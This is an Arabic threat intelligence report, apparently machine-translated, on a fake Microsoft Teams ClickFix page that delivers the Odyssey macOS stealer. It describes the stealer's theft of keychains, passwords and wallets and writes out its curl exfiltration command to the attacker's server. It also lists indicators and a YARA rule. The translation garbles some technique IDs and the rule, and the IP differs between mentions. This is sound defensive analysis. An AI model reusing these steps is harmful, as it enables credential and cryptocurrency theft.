استخبارات الخصم

يقوم ممثلو التهديد بانتحال شخصية Microsoft Teams لتسليم Odyssey macOS Stealer عبر Clickfix

تستغل الجهات الفاعلة في مجال التهديد موقع تنزيل Microsoft Teams المزيف لتسليم سارق Odyssey macOS عبر Clickfix. بمجرد تنفيذه، يقوم البرنامج الضار بجمع بيانات الاعتماد وملفات تعريف الارتباط و Apple Notes ومحافظ التشفير، وسحب البيانات إلى خادم C2 قبل ضمان الثبات من خلال LaunchDaemons وحتى استبدال Ledger Live بإصدار ثلاثي. تشكل الحملة مخاطر شديدة تتمثل في سرقة أوراق الاعتماد والخسارة المالية والإصابة مرة أخرى على المدى الطويل.

September 5, 2025

min

Table of Content

Example H2

ملخص تنفيذي

في أوائل أغسطس 2025، أصدرت Forcepoint أبلغ عن حول حملة clickfix التي انتحلت شخصية Tradingview لتقديم سارق أوديسي. أثناء اكتشاف البنية التحتية الروتينية، حددت TRIAD من CloudSek أن الجهات الفاعلة في مجال التهديد تجذب المستخدمين الآن عبر موقع تنزيل Microsoft Teams مزيف. عندما يقوم الضحايا بنسخ الأمر المقدم، يتم تنفيذ سارق AppleScript المشفر باستخدام base64 (Odyssey). تقوم البرامج الضارة بتجميع بيانات الاعتماد وملفات تعريف الارتباط الخاصة بالمتصفح وApple Notes والعديد من محافظ العملات المشفرة القائمة على سطح المكتب/الإضافات، وتنظيم البيانات إلى /tmp/out.zip قبل تسريبها إلى C2. ثم يثبت الثبات عبر LaunchDaemons ويستبدل Ledger Live بنسخة ثلاثية.

‍

التحليل

خلال دورة اكتشاف وإسناد البنية التحتية الروتينية للمهاجمين، اكتشفنا عددًا من مواقع التسليم ذات السمات الخاصة بـ Clickfix والتي تستهدف مستخدمي macOS. وقد تبين أن أحد هذه المواقع ينتحل شخصية Microsoft، مع شعار «Microsoft Teams» على صفحة التسليم. الصيد باستخدام أريكة، وجدنا 24 عنوان IP فريدًا ينتمي إلى نفس المجموعة.

‍

عندما تنقر الضحية على «نسخ»، يتم نسخ الأمر إلى الحافظة، اعتمادًا على وكيل المستخدم. بالنسبة لنظام التشغيل windows، فإنه ينسخ نفس الأمر المعروض. بالنسبة لمستخدمي macOS، فإنه ينسخ ما يلي:

‍

الحافظة - وكيل مستخدم macOS

النص المشفر base64، الذي تم فك تشفيره أدناه:

‍

محتويات البرنامج النصي للتسليم

1) التنفيذ

يقوم سطر واحد بتشغيل برنامج AppleScript كبير مضمن مع osascript -e 'تشغيل البرنامج النصي... '. لا يوجد استغلال، فقط تنفيذ البرنامج النصي. (1059.002)

2) الاكتشاف

<random>يجمع مخزون النظام باستخدام system_profiler SPSoftwareDataType sPhardwareDataType SPDisplaysDataType؛ يخزنه كـ «جهاز» في ملف تشغيل مؤقت dir /tmp/ /. (1082)

3) الوصول إلى بيانات الاعتماد، تصعيد الامتيازات

يتحقق مما إذا كان بإمكانه مصادقة المستخدم المحلي باستخدام dscl. authonly. إذا لم يكن كذلك، فإنه يطالب المستخدم مع مربع حوار مزيف: «مساعد التطبيق المطلوب. يرجى إدخال كلمة مرور الجهاز للمتابعة.» يتم التكرار حتى يتم إدخال كلمة المرور الصحيحة. (رقم 1056.002، رقم 110)
يحاول سحب عنصر سلسلة مفاتيح Chrome عبر الأمان... ابحث عن كلمة المرور العامة -ga «Chrome» ويكتب ملف «masterpass-chrome». (T1555.001)
يقوم بتخزين كلمة المرور الملتقطة في ~/.pwd. (رقم 155، رقم 1078)

4) المجموعة

نظام أبل البيئي

قاعدة بيانات أبل نوتس (Notestore.SQLite، -wal، -shm) + نسخة احتياطية من ذلك يتحدث إلى تطبيق Notes لتصدير هيئات الملاحظات إلى HTML؛ أيضًا الفراغات مرفقات الملاحظات من مجلدات «الوسائط» الخاصة بالملاحظات. (رقم 119، رقم 113)
أدوات Safari: ملفات تعريف الارتباط. ملفات تعريف الارتباط الثنائية، «قيم النموذج». (T1555.003، T1539)
<HardwareUUID>نسخة سلسلة مفاتيح تسجيل الدخول: ~/المكتبة/سلاسل المفاتيح/ وتسجيل الدخول. keychain-db. (T1555.001)

المتصفحات (عائلة كروميوم: كروم، بريف، إيدج، فيفالدي، أوبرا، أوبيراغإكس، كروميوم، إلخ.)

يمشي على كل ملف تعريف افتراضي/ملف تعريفي * ونسخه:
- ملفات تعريف الارتباط وبيانات الويب وبيانات تسجيل الدخول (عمليات تسجيل الدخول المحفوظة والملء التلقائي). (1555.003)
- إعدادات الامتداد المحلية/والفهرسة DB/ لـ قائمة السماح الطويلة جدًا بمعرفات الإضافات (المحافظ ومديري كلمات المرور وما إلى ذلك). (1005)

المتصفحات (عائلة جيكو: فايرفوكس، واترفوكس)

يقوم بنسخ ملفات تعريف الارتباط. sqlite، وformhistory.sqlite، وkey4.db، وlogins.json من كل ملف تعريف. (1555.003)
الصيد على وجه التحديد قناع ميتا التخزين عن طريق تحليل prefs.js لاشتقاق مسار تخزين الإضافة، ثم نسخ مجموعات idb الخاصة بها. (1005)

محافظ العملات المشفرة (تطبيقات سطح المكتب)

يقوم بنسخ البيانات بشكل متكرر لإلكروم، وكوينومي، وإكسدوس، وأتوميك، وواسابي، ومونيرو، وبيتكوين كور، ولايتكوين كور، وداش كور، وإلكترون كاش، وغواردا، ودوجكوين كور، وتريزور سويت، بالإضافة إلى ليدجر لايف. (تي 155، 105)
يلتقط أيضًا مسارات تكوين باينانس/تونكيبر.

حقيبة يد

من سطح المكتب/المستندات، ينسخ بهدوء ما يصل إلى 10 ميغابايت من الملفات بامتدادات «مثيرة للاهتمام»: txt، pdf، doc، docx، المفاتيح، المفتاح، المحفظة، kdbx، jpg، png، jpeg، rtf. (1005)

5) إعداد المنفى

أشجار دليل المرايا ولكن يتخطى المخابئ الصاخبة (ذاكرة التخزين المؤقت لوحدة معالجة الرسومات، وذاكرة التخزين المؤقت للكود، ولوحة التعطل، وذاكرة التخزين المؤقت، وما إلى ذلك). (1074)
يقوم بأرشفة كل شيء إلى /tmp/out.zip عبر ديتو -c -k. (1560)

6) الاستخراج، C2

كيرل إكس بوست... --data-binary @/tmp/out.zip http://185.93.89.62/log مع عنوان الإنشاء، اسم المستخدم: vipx، التكرار: false. إعادة المحاولة عند الفشل. (1041)
يقدم نفس المضيف حمولات ثانوية على /otherassets/plist و /otherassets/ledger.zip. (105)

7) المثابرة والتهرب الدفاعي، C2

إطلاق برنامج Daemon الدائم: يقوم بتنزيل سلسلة أوامر shell، ويلفها في com باسم عشوائي. <random>.plist، يتم تثبيته على /Library/launchDaemons/، وتشغيل نظام bootstrap...؛ يعود إلى تشغيل nohup في حالة فشل bootstrap. يتطلب sudo، ومن هنا جاءت مطالبة كلمة المرور مسبقًا. (T1543.004، T1053.003)
استبدال التطبيق: يقتل و يستبدل تطبيق ليدجر لايف باستخدام ملف ZIP تم جلبه من C2، باستخدام sudo لإزالة وفك الضغط إلى /Applications. (رقم 1036، رقم 1112/ت 1105)
ينظف دير العمل و /tmp/out.zip بعد التحميل. (1070.004)

‍

يتم تشغيل نموذج Odyssey هذا عبر osascript، ويسرق سلاسل المفاتيح وملفات تعريف الارتباط وعمليات تسجيل الدخول المحفوظة و Apple Notes وعشرات متاجر المحفظة/الإضافات، ويضغط كل شيء، ويشحنه إلى http://185.93.89[.]62/log، ثم يزرع المثابرة (LaunchDaemon) وحتى يستبدل Ledger Live بنسخة ثلاثية. تستضيف C2 أيضًا لوحة تسجيل الدخول إلى Odyssey stealer.

‍

مؤشرات التسوية

Type	Indicator
IP / C2	185.93.89[.]162 (HTTP, /log, /otherassets/plist, /otherassets/ledger.zip)
Delivery Clickfix	teamsonsoft[.]com
Hashes (sha256)	9c520fa25239c0f116ce7818949ddce5fd2f315317863715416cb488 6c5aeb2 7a8250904e6f079e1a952b87e55dc87e467cc560a2694a142f2d6547a c40d5e1 d81cc9380673cb36a30f2a84ef155b0cbc7958daa6870096e455044fb a5f9ee8 397ee604eb5e20905605c9418838aadccbbbfe6a15fc9146442333cfc 1516273 909038524250903a44efd734710e60a8f73719130176c726e58d3287b 22067c8
File Artifacts	~/.pwd, ~/.username, ~/.chost, ~/.botid
Persistence	/Library/LaunchDaemons/com.<random>.plist (random numeric suffix)
Process/Commands	osascript -e run script, dscl . authonly, security ... -ga "Chrome", ditto -c -k, curl -X POST ... --data-binary @/tmp/out.zip, unzip /tmp/ledger.zip
App Tampering	Replacement of /Applications/Ledger Live.app with trojanized version

التأثير

سرقة بيانات الاعتماد: تمت سرقة بيانات تسجيل الدخول إلى المتصفح وبيانات الملء التلقائي وسلاسل المفاتيح وبيانات اعتماد المحفظة المشفرة.
استخراج البيانات: تم تسريب الملاحظات والمستندات ولقطات الشاشة وما يصل إلى 10 ميغابايت من الملفات الشخصية.
السرقة المالية: تسوية مباشرة لمحافظ العملات المشفرة (سطح المكتب+الامتداد+العبث بـ Ledger Live).
الثبات وإعادة العدوى: يضمن LaunchDaemon على مستوى النظام الوصول طويل الأجل ومخاطر الإصابة مرة أخرى.

‍

عوامل التخفيف

عناصر التحكم في الشبكة: راقب نقاط curl POSTs غير العادية ذات البيانات المضغوطة.
البحث عن نقطة النهاية: التدقيق/المكتبة/LaunchDaemons/للاتصالات المشبوهة. <digits>.plist وعمليات الإعدام الأخيرة في المخطوطات.
النظافة الشخصية: إعادة تعيين كلمات مرور Apple ID والمتصفح والمحفظة؛ إعادة إصدار المفاتيح من أنظمة غير منقوصة.
الاحتواء والاسترداد: قم بإزالة trojanized /Applications/Ledger Live.app، ومسح العناصر المؤقتة، وإعادة إنشاء أنظمة macOS المصابة إذا لم يكن من الممكن ضمان النزاهة.

‍

قاعدة يارا

قاعدة OSX_أوديسي_أوساسكريبت_EXEC

{

ميتا:

الوصف = «يكتشف تنفيذ برنامج AppleScript لسارق أوديسي عبر أوساسكريبت»

التاريخ = «2025-09-04"

سلاسل:

$osascript = «أوساسكريبت -تشغيل البرنامج النصي» ascii

$dscl_auth = «dscl. autho فقط» ascii

$security_chrome = «الأمان» بدون غطاء

$masterpass = «ماسترباس-كروم» أسي

الشرط:

كل منهم

}

‍

المراجع

‍

كوشيك بالم

Threat Researcher at CloudSEK, specializing in digital forensics, incident response, and adversary hunting to uncover attacker motives, methods, and operations.

No items found.